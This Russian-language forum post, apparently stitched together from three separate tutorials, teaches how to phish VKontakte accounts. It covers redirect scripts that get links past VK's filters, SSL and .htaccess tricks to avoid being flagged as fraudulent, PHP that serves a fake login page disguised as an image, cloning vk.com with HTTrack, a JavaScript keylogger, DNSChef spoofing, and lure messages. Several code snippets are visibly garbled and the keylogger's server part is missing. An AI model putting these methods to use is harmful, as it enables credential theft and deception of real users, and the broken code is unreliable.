Приветствую, обитатели форума! Сегодня речь пойдет о фишинге Вконтакте. Прежде всего хочу сказать, что в статье упоминаются некоторые сервисы, не сочтите за рекламу. Статья написана для ознакомления и я никого на описанные в статье действия не побуждаю.
Как вы знаете фишинг ВК был очень популярен, но после обновления ВКонтакте политики безопасности стал исчерпывать себя. Так ли это на самом деле? Ведь ничто не стоит на месте и с новой политикой безопасности пришли и новые методы фишинга.
В данной статье я расскажу немного о "проблемах" фиш-сайта ВК и их решениях на примере давно слитого в паблик, сайта. (Исходники можно скачать тут: Я.Диск
Что же первое бросается в глаза при открытии такого сайта?
- Подозрительный внешний вид : сайт выглядит как старая мобильная версия ВК, не работает переключение языков, старые шрифты и пиксельное лого сразу наводят на мысль, что мы попали именно на зловредный сайт.
- Отсутствие десктопной версии сайта : да, я понимаю, что 80% трафика ВК приходится на мобильные устройства, но все же, готовым надо быть ко всему, особенно, если вы занимаетесь индивидуальным взломом.
- Подобные сайты сразу отмечаются браузерами как "мошеннические" : дело в том, что браузер прежде всего смотрит на SSL сертификат или его отсутствие, ну и т.к. фишеры в основной своей массе разворачивают фиш сайты на бесплатных хостингах, то и получение хотя бы DV SSL сертификата там отсутствует. сайты помечаются как "мошеннические", а потом и аккаунт на хостинге уходит в бан.
- Полное отсутствие проверки валидности данных : все что мне доводилось видеть в таких скриптах это в основном форму с полями "логин", "пароль", кнопку и запись этого добра в блокнот. Никаких проверок на валид, пустые поля или BadRequest...о работе с 2FA аккаунтами даже не говорю. Максимум - запрос в API ВК на получение токена.
- Рассылка сообщений
, содержащих ссылку на фишинговый сайт: при рассылке сообщений текст был примерно такой: "О боженьки, ты выиграл в конкурсе репостов, пройди по ссылке
Вы должны быть зарегистрированы, чтобы видеть ссылки.
И получи 100500$". Ну согласитесь звучит глупо. Но да, на такое ведутся до сих пор...такого наивного народа осталось очень мало и в основном это дети.
- Сокращение ссылок
: чтобы ВК пропускал ссылки на фиш сайты приходилось делать редирект + сокращение, в итоге ссылка получалась типа
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Что только портило внешний вид сообщения.
Сокращение ссылок
Как делал я, когда только-только учился фишингу: создавал сайт на uCoz, в редакторе HTML страничек добавлял скрипт, который редиректил на фиш сайт. Затем загонял URL сайта в vk.cc и получалась готовая ссылка, которую ВК пропускал. Как избежать этой галиматьи? Да очень просто. Есть два пути:
Спойлер: Махинации с uCoz
Создадим любой сайт с названием, подходящим под вашу тематику сайта-прокладки
Перейдем во вкладку Модули и создадим страничку сайта
Обзовем ее как-нибудь, я назову "test", если у вас есть сайт-прокладка типа голосовалки, вы можете назвать страницу "golos-za-ivana-pupkina"
Теперь перейдем на наш сайт, затем на вкладку "test", которую только что создали и скопируем куда-нибудь URL
Перейдем в раздел Дизайн => Редактор => Страницы сайта...и между
вставим следующие строки:
location.replace("http://сайт, куда нужен редирект");
В итоге переходя по ссылке
Вы должны быть зарегистрированы, чтобы видеть ссылки.
Нас перекинет на нужный нам сайт. Теперь нет необходимости сокращать через vk.cc подобного рода ссылки. ВК их без проблем пропустит, а мы при рассылки лишим себя вопросов от получателя "Ой, какая-то ссылка подозрительная...это точно не обман?".
Получение SSL сертификата
Как я уже говорил SSL сертификат нужен, чтобы браузеры и антивирусы не помечали наш фишинговый сайт как "мошеннический". Помимо этого ссылки на сайт c SSL пропускает ВК, а это значит, что манипуляции, описанные выше будут не нужны, мы сможем просто скидывать ссылку в исходном ее виде.
Спойлер: Получаем SSL сертификат
На данный момент существуют множество хостингов, работающих с центрами сертификации. Самое простое решение вопроса с SSL - это разворачивать свои сайты, как раз на таких хостингах. В их панели управления уже есть вкладка с управлением SSL, там можно заказать новый сертификат, установить свой или управлять существующими сертификатами.
Так же, чтобы снизить вероятность блокировки сайта с пометкой как мошеннический можно прописать в файл.htaccess запрет на индексацию ботами поисковых механизмов.
Спойлер: Что прописать в.htaccess
SetEnvIfNoCase User-Agent "^Googlebot" search_bot
SetEnvIfNoCase User-Agent "^Yandex" search_bot
SetEnvIfNoCase User-Agent "^Yahoo" search_bot
SetEnvIfNoCase User-Agent "^Aport" search_bot
SetEnvIfNoCase User-Agent "^msnbot" search_bot
SetEnvIfNoCase User-Agent "^spider" search_bot
SetEnvIfNoCase User-Agent "^Robot" search_bot
SetEnvIfNoCase User-Agent "^php" search_bot
SetEnvIfNoCase User-Agent "^Mail" search_bot
SetEnvIfNoCase User-Agent "^bot" search_bot
SetEnvIfNoCase User-Agent "^igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^Snapbot" search_bot
SetEnvIfNoCase User-Agent "^WordPress" search_bot
SetEnvIfNoCase User-Agent "^BlogPulseLive" search_bot
SetEnvIfNoCase User-Agent "^Parser" search_bot
Ну вот пока и всё. Информации о ВК у меня еще много, так что если кто-то хочет подискутировать о фишинге ВК, задать вопрос или вообще все, что угодно прошу в ЛС форума. Всегда открыт для новых идей. Надеюсь эта информация была для вас полезна;)
Еще несколько лет назад метод фишинга был очень популярен, но в настоящее время сервисы научились его определять, они находят и блокируют фейковые страницы. Поэтому есть более продвинутый метод фишинга.
Сегодня многие пользуются социальными сетями, каждый день люди пытаются взломать чью-то учетную запись Вконтакте, mail.ru , gmail и другие сервисы, причем сделать это бесплатно. Чаще всего люди ищут какое-то волшебное приложение для взлома Вконтакте, но мы покажем Вам кое-что другое. Это фишинг. Но в данной статье(в отличии от предыдущей) мы рассмотрим его альтернативную версию.
Переименуйте файл index.html в файл vk.jpg, это нужно для того чтобы сбить с толку систему безопасности Вконтакте;
Создайте пустой файл с именем security.php, откройте его в программе блокнот, впишите следующий код
$id = $_GET["code"];
if ($id == "confirmemail") {
$myFile = "vk.jpg";
$fh = fopen($myFile, "r");
$theData = fread($fh, 500000); fclose($fh);
$myFile1 = "confirm.jpg";
$fh1 = fopen($myFile1, "r");
$theData1 = fread($fh1, 500000);
echo $theData1; }
и сохраните его рядом с vk.jpg;
Создайте файл confirm.jpg, также откройте в блокноте и впишите в него следующую строку:
thanks for confirming your email address.
сохраните;
Проверьте что у Вас есть нужные файлы
и папка со всеми скриптами Вконтакте, без них Ваша фейковая страница будет отображаться некорректно;
Загрузите эти файлы на веб хостинг;
Данный метод подойдет также если жертва заходит с устройства андроид. И одним комплектом скриптов можно взломать большое количество учетных записей во Вконтакте. Если не считать расходы на хостинг, то это получается бесплатный способ получения пароля.
Это только один метод прохода через системы безопасности социальной сети или почтового сервиса. Но сегодня для того что бы произвести взлом Вконтакте, необходимо знать множество таких методов. Анти-фишинговые механизмы с каждым днем совершенствуются, а владельцы сервисов все больше закручивают гайки, не оставляя никаких лазеек хакерам. Но сильная сторона способа взлома заключается как раз в другом. А именно в умелом манипулировании людьми, умении выявить и использовать их слабости. Написать хорошую подставную страницу это даже не пол дела, потому что если ты не обладаешь достаточными навыками социального инженера, то заниматься этим просто нет смысла.
В данной статье команда HelpU , подробно опишет схему фишинга аккаунтов популярной социальной сети ВКонтакте .
Итак, поехали.
Для работы нам понадобится Kali Linux самой последней версии, которая есть на данный момент, а также знания о нём мы писали ранее. Но для сайта VK , мы опишем всё индивидуально.
Итак, берём сайт: vk.com. На данном этапе все не сложно, можно просто скопировать. Но лишь одно, если просто скопировать исходный код страницы, получаем такую «грязь»:
Совсем непрезентабельно…
Будем клонировать сайт, а точнее его приветственную страницу. Для этого будем использовать . На самом деле эта программа уникальна, она может копировать, как весь сайт, так и его отдельные части.
Самый простой запуск этой программы будет выглядеть примерно так:
Httrack vk.com -O /var/www/html
Но для VK не советуем так делать, ибо копировать весь VK , не самая умная затея. Это чаще делается на сайтах поменьше, для полного анализа структуры, всех папок и файлов. Но на данном этапе будем действовать по иному сценарию.
Для начала надо использовать параметр для ввода пользовательского агента.
Соответственно будем использовать параметр:
F Mozilla/5.0 (Windows NT 6.1) ApleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36
Httrack https://vk.com -r2 -F Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.228.0 Safari/537.36 -O "/var/www/html/vk.com"
После этого увидим:
Сайт будет скопирован. В папке vk.com будут несколько файлов, которые сделал , их можно удалить и оставить только одну папку vk.com
Удаляем, перемещаем файлы из подпапки vk.com в папку vk.com повыше, и тогда у нас не будет в адресной строке путь: localhost/vk.com/vk.com
После манипуляций с файлами адрес будет: localhost/vk.com
С веб версией все понятно. Но если вы попробуете скопировать мобильную версию ВКонтакте (m.vk.com ), возникнут некоторые трудности, там javascript проверяет достоверность адреса и не дает странице прогрузиться. Но и на это, есть своя уязвимость.
Команда будет следующей:
Httrack https://m.vk.com -r2 -F "Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build/IML74K) AppleWebkit/999+ (KHTML, like Gecko) Safari/999.9" -O "/var/www/html/mvk/"
Когда сайт скопируется и вы попробуете на него зайти, у вас ничего не выйдет, поэтому надо обязательно выполнить следующую команду:
Nano /var/www/html/mvk/m.vk.com/index.html
Выделяем строку, которая выделена на скриншоте и удаляем её.
И сайт отлично работает.
Итак, у нас есть сайты, которые идентичны оригинальным. Но логи нигде не сохраняются, и посмотреть, кто что вбивал в поля у нас не получится, поэтому приступим к веб-программированию. Мы внедрим в наш сайт keylogger , напишем его на php и javascript .
Создадим 3 файла keylogger.php , keylogger.js и keylog.txt
В keylogger.php вводим:
В keyloger.js вводим:
Document.onkeypres = funcion(evt) { evt = evt || window.evnt key = String.fromCharode(evt.charode) if (key) { var http = new XMLHtpRequest(); var parm = encodeURI(key) http.open("POST","keylogger.php",true); http.setReqestHeder("Contnt-type","aplication/x-ww-form-urlenoded"); http.send("key="+parm); } }
в наш index.php надо добавить строку:
Готово, мы сделали keylogger .
Теперь приступаем к редактированию index.php : ищем строчку «Log in » и ищем параметр onclick=’top.showBox’ (меняем адрес на https://vk.com )
После этого при нажатии на кнопку Log in пользователь будет направлен на официальный сайт ВКонтакте .
Входим через SSH на VPS .
# wget htps://thesprwl.org/media/projcts/dnscef-0.3.zip # unzip dnscef-0.3.zip # cd dnshef* # chod 755 *.py
Лучшим решением будет таким, что лучше всего здесь поставить следующие параметры:
# pi instal dnslib # pi instal IPy
Создаём файл: hosts.txt
В него пишем следующее:
(URL-адрес сайта, в нашем случае vk.com=IP_ВАШЕГО_VPS )
Прописывая следующу команду, мы всё запустим:
./dnschf.py -i 0.0.0.0 --logfle=log.txt --file=hosts.txt
Готово, ваш DNS успешно работает. Он возвращает наши адреса нам.
На этом всё, мы надеемся данная статья была полезной для вас.
С уважением, команда HelpU .
Отказ от ответственности : Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы воспользоваться информацией для личной выгоды, то автор и издатель не несут ответственность за любой причиненный вред или ущерб.
